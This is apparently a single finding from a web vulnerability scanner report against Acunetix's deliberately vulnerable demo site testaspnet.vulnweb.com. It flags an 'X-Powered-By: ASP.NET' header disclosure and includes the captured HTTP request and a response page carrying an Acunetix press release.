Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAg